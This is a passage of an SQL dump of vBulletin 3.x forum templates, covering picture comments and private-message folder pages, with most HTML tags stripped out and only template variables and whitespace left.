    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876422, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1479, -1, 'picturecomment_editor', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\".(($show[\'delete\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[delete_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'edit\']) ? (\"\r\n $vbphrase[user]: session->vars[\'sessionurl\'] . \"u=$albuminfo[userid]\\\">$albuminfo[username]\r\n $vbphrase[edit_picture_comment]\r\n \") : (\"\r\n $vbphrase[post_new_picture_comment]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    $vbphrase[comment]:
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \".(($show[\'edit\']) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n
    \r\n
    \r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \".(($show[\'edit\']) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[delete_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n$postpreview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[user]: $albuminfo[username]\r\n $vbphrase[edit_picture_comment]\r\n \r\n $vbphrase[post_new_picture_comment]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    $vbphrase[comment]:
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876440, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1480, -1, 'picturecomment_form', '\".(($show[\'quickcomment\']) ? (\"\r\n $vBeditTemplate[clientscript]\r\n\r\n
    \r\n
    session->vars[\'sessionurl\'] . \"do=message\\\" method=\\\"post\\\" id=\\\"message_form\\\">\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
     
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[comment]:\r\n $vbphrase[note_comment_may_be_visible_locations]\r\n
    \r\n
    $messagearea
    \r\n \".(($allowed_bbcode) ? (\"
    $allowed_bbcode
    \") : (\"\")).\"\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_comment]\r\n $vbphrase[posting_message_please_wait]\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n', '\r\n $vBeditTemplate[clientscript]\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
     
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[comment]:\r\n $vbphrase[note_comment_may_be_visible_locations]\r\n
    \r\n
    $messagearea
    \r\n
    $allowed_bbcode
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_comment]\r\n $vbphrase[posting_message_please_wait]\r\n
    \r\n
    \r\n
    \r\n
    \r\n', 'template', 1209736605, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1481, -1, 'picturecomment_message', '
  • \r\n \".(($message[\'avatarurl\']) ? (\"\r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n \".(($show[\'picture\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[picture_x_by_y]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"albumid=$message[albumid]&pictureid=$message[pictureid]\", \"$message[caption]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[pictureowner_userid]\", \"$message[pictureowner_name]\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    $message[message]
    \r\n\r\n \r\n\".(($message[\'avatarurl\']) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n \r\n
  • ', '
  • \r\n \r\n \r\n \r\n\r\n \r\n
  • ', 'template', 1218204972, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1482, -1, 'picturecomment_message_deleted', '
  • \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n\r\n \".(($show[\'picture\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[picture_x_by_y]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"albumid=$message[albumid]&pictureid=$message[pictureid]\", \"$message[caption]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[pictureowner_userid]\", \"$message[pictureowner_name]\") . \"
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n \".(($show[\'deleted\']) ? (\"
    $message[message]

    \") : (\"\")).\"\r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason] $message[del_reason]\") : (\"\")).\"\r\n
    \r\n \r\n \".(($show[\'edit\'] OR $show[\'reportlink\']) ? (\"\r\n \r\n \") : (\"\")).\" \r\n
  • ', '
  • \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n \r\n $message[musername]\r\n \r\n $message[musername]\r\n \r\n\r\n \r\n
    $vbphrase[picture_x_by_y]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    $message[message]

    \r\n\r\n
    \r\n $vbphrase[message_deleted_by_x]\r\n $vbphrase[reason] $message[del_reason]\r\n
    \r\n \r\n \r\n \r\n \r\n
  • ', 'template', 1219146391, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1483, -1, 'picturecomment_message_global_ignored', '
  • \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n\r\n \".(($show[\'picture\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[picture_x_by_y]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"albumid=$message[albumid]&pictureid=$message[pictureid]\", \"$message[caption]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[pictureowner_userid]\", \"$message[pictureowner_name]\") . \"
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    \r\n
  • ', '
  • \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n $message[musername]\r\n\r\n \r\n
    $vbphrase[picture_x_by_y]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrator_decided_x_quiet]\r\n
    $vbphrase[this_message_is_moderated]
    \r\n
    \r\n
  • ', 'template', 1211901483, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1484, -1, 'picturecomment_message_ignored', '
  • \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n\r\n \".(($show[\'picture\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[picture_x_by_y]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"albumid=$message[albumid]&pictureid=$message[pictureid]\", \"$message[caption]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[pictureowner_userid]\", \"$message[pictureowner_name]\") . \"
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    \r\n
  • ', '
  • \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n $message[musername]\r\n\r\n \r\n
    $vbphrase[picture_x_by_y]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[message_hidden_x_on_ignore_list]\r\n
    $vbphrase[this_message_is_moderated]
    \r\n
    \r\n
  • ', 'template', 1208183818, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1485, -1, 'picturecomment_message_moderatedview', '
  • \r\n \r\n \r\n \r\n \r\n \r\n
    options[\'album_thumbsize\'] . \"\\\">\r\n \".(($pictureinfo[\'thumburl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$pictureinfo[albumid]&pictureid=$pictureinfo[pictureid]\\\">\\\"$pictureinfo[caption_preview]\\\"\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$pictureinfo[albumid]&pictureid=$pictureinfo[pictureid]\\\">\".(($pictureinfo[\'caption_preview\']) ? (\"$pictureinfo[caption_preview]\") : (\"$vbphrase[picture]\")).\"\r\n \")).\"\r\n \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n \".(($show[\'picture\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[picture_x_by_y]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"albumid=$message[albumid]&pictureid=$message[pictureid]\", \"$message[caption]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[pictureowner_userid]\", \"$message[pictureowner_name]\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    $message[message]
    \r\n \r\n \".(($message[del_username]) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason] $message[del_reason]\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \r\n
    \r\n
  • ', '
  • \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \"$pictureinfo[caption_preview]\"\r\n \r\n $pictureinfo[caption_preview]$vbphrase[picture]\r\n \r\n \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n \r\n $message[musername]\r\n \r\n $message[musername]\r\n \r\n \r\n
    $vbphrase[picture_x_by_y]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[this_message_is_moderated]
    \r\n
    $message[message]
    \r\n \r\n \r\n
    \r\n $vbphrase[message_deleted_by_x]\r\n $vbphrase[reason] $message[del_reason]\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n
  • ', 'template', 1219147313, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1486, -1, 'picturecomment_preview', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'errors\']) ? (\"\r\n $vbphrase[errors_occured_when_submitted]:\r\n \") : (\"\r\n $vbphrase[preview]\r\n \")).\"\r\n
    \r\n \".(($show[\'errors\']) ? (\"\r\n \r\n
      $errorlist
    \r\n \r\n \") : (\"\r\n\r\n \".(($newpost[\'title\']) ? (\"\r\n \r\n
    \r\n $message[title]\r\n
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n $previewmessage\r\n \")).\"\r\n
    \r\n\r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[errors_occured_when_submitted]:\r\n \r\n $vbphrase[preview]\r\n \r\n
    \r\n \r\n \r\n
      $errorlist
    \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n $message[title]\r\n
    \r\n
    \r\n \r\n
    \r\n $previewmessage\r\n
    \r\n
    \r\n\r\n
    ', 'template', 1205156434, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'), (1487, -1, 'pm_editfolderbit', '\r\n \r\n $vbphrase[folder_name]: \".(($show[\'messagecount\']) ? (\"$vbphrase[empty_folder]\") : (\"\")).\"
    \r\n \r\n \".(($show[\'messagecount\']) ? (\"$vbphrase[messages]: $foldertotal\") : (\"\")).\"\r\n \r\n', '\r\n \r\n $vbphrase[folder_name]: $vbphrase[empty_folder]
    \r\n $vbphrase[folder_id_x]\" />\r\n $vbphrase[messages]: $foldertotal\r\n \r\n', 'template', 1136290628, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1488, -1, 'pm_editfolders', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_folders]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[standard_folders]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[x_contains_y_messages]\", \"private.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"folderid=0\", \"$vbphrase[inbox]\", \"$inboxtotal\") . \" $vbphrase[empty_folder]
    \" . construct_phrase(\"$vbphrase[x_contains_y_messages]\", \"private.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"folderid=-1\", \"$vbphrase[sent_items]\", \"$sentitemstotal\") . \" $vbphrase[empty_folder]
    \r\n
    \r\n\r\n \".(($show[\'customfolders\']) ? (\"\r\n
    \r\n $vbphrase[your_custom_folders]\r\n \r\n $editfolderbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_rename_a_folder]
    $vbphrase[to_delete_a_folder]
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[add_new_folders]\r\n \r\n $addfolderbits\r\n \r\n \r\n \r\n
    $vbphrase[to_add_a_new_folder]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_folders]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[standard_folders]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[x_contains_y_messages] $vbphrase[empty_folder]
    $vbphrase[x_contains_y_messages] $vbphrase[empty_folder]
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[your_custom_folders]\r\n \r\n $editfolderbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_rename_a_folder]
    $vbphrase[to_delete_a_folder]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[add_new_folders]\r\n \r\n $addfolderbits\r\n \r\n \r\n \r\n
    $vbphrase[to_add_a_new_folder]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876524, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1489, -1, 'pm_emptyfolder', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[confirm_deletion]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[confirm_deletion]\r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[delete_items_in_x]\", \"$folder\") . \"
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[confirm_deletion]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[confirm_deletion]\r\n \r\n \r\n \r\n \r\n
    $vbphrase[delete_items_in_x]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876532, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1490, -1, 'pm_filter', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\noptions[\'simpleversion\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \r\n \\\"\\\"\r\n \r\n $vbphrase[display_options]\r\n
    \r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n \r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\".(($show[openfilter]) ? (\"\r\n \r\n\") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \r\n \"\"\r\n \r\n $vbphrase[display_options]\r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n \r\n', 'template', 1238668943, 'vBulletin Solutions', '3.8.3', 'vbulletin'), (1491, -1, 'pm_messagelist', '\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[private_messages_in_folder]: $foldername\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[folder_controls]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($receipts[\'unconfirmed\'] OR $receipts[\'confirmed\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \" . construct_phrase(\"$vbphrase[x_contains_y_z_messages_of_xx]\", \"$foldername\", \"$totalmessages\", \"$pmtotal\", \"$pmquota\") . \" ($vbphrase[empty_folder])
    \r\n \r\n \r\n \".(($show[\'thisfoldertotal\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'allfolderstotal\']) ? (\"\") : (\"\")).\"\r\n \".(($tdwidth[quota] > 0) ? (\"\") : (\"\")).\"\r\n \r\n
     userinfo[\'pmtotal\'] . \"\") . \"\\\">  
    \r\n
    \r\n $vbphrase[jump_to_folder]:
    \r\n $gobutton\r\n
    session->vars[\'sessionurl\'] . \"do=trackpm\\\">\" . construct_phrase(\"$vbphrase[you_have_x_and_y_receipts]\", \"$receipts[confirmed]\", \"$receipts[unconfirmed]\") . \"
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\".(($show[\'messagelist\']) ? (\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"\") : (\"\")).\"\r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\".(($totalmessages) ? (\"\r\n\r\n\r\n \r\n \r\n \".(($show[\'pmcheckbox\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n\r\n$messagelist_periodgroups\r\n\") : (\"\r\n\r\n \r\n \r\n \r\n\r\n\")).\"\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n $vbphrase[private_messages_in_folder]: $foldername\r\n
    \r\n
    \r\n $vbphrase[date] $sortarrow[date]\r\n
    \r\n
    \r\n $vbphrase[title] $sortarrow[title] / \r\n $vbphrase[sender] $sortarrow[sender]\r\n
    \r\n
    \r\n $vbphrase[no_messages_to_display]\r\n
    \r\n
    \r\n $vbphrase[selected_messages]:\r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n
    \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"\") : (\"\")).\"\r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$sortfilter\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"$vbphrase[unread_message]\\\"  $vbphrase[unread_message]
    \\\"$vbphrase[read_message]\\\"  $vbphrase[read_message]
    \\\"$vbphrase[repliedto_message]\\\"  $vbphrase[repliedto_message]
    \\\"$vbphrase[forwarded_message]\\\"  $vbphrase[forwarded_message]
    \r\n
    \r\n $vbphrase[download_all_private_messages_as]:
    \r\n session->vars[\'sessionurl\'] . \"do=downloadpm&dowhat=xml\\\">$vbphrase[xml] |\r\n session->vars[\'sessionurl\'] . \"do=downloadpm&dowhat=csv\\\">$vbphrase[csv] |\r\n session->vars[\'sessionurl\'] . \"do=downloadpm&dowhat=txt\\\">$vbphrase[text]\r\n
    $forumjump
    \r\n', '\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[private_messages_in_folder]: $foldername\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[folder_controls]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[x_contains_y_z_messages_of_xx] ($vbphrase[empty_folder])
    \r\n \r\n \r\n \r\n \r\n 0\">\r\n \r\n
    $vbphrase[messages_stored_in_folder_x]\"> $vbphrase[total_messages_in_all_folders_x]\"> $vbphrase[maximum_allowed_messages_x]\"> 
    \r\n
    \r\n $vbphrase[jump_to_folder]:
    \r\n $gobutton\r\n
    $vbphrase[you_have_x_and_y_receipts]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n$messagelist_periodgroups\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n $vbphrase[private_messages_in_folder]: $foldername\r\n
    colspan=\"2\">\r\n
    \r\n $vbphrase[date] $sortarrow[date]\r\n
    \r\n
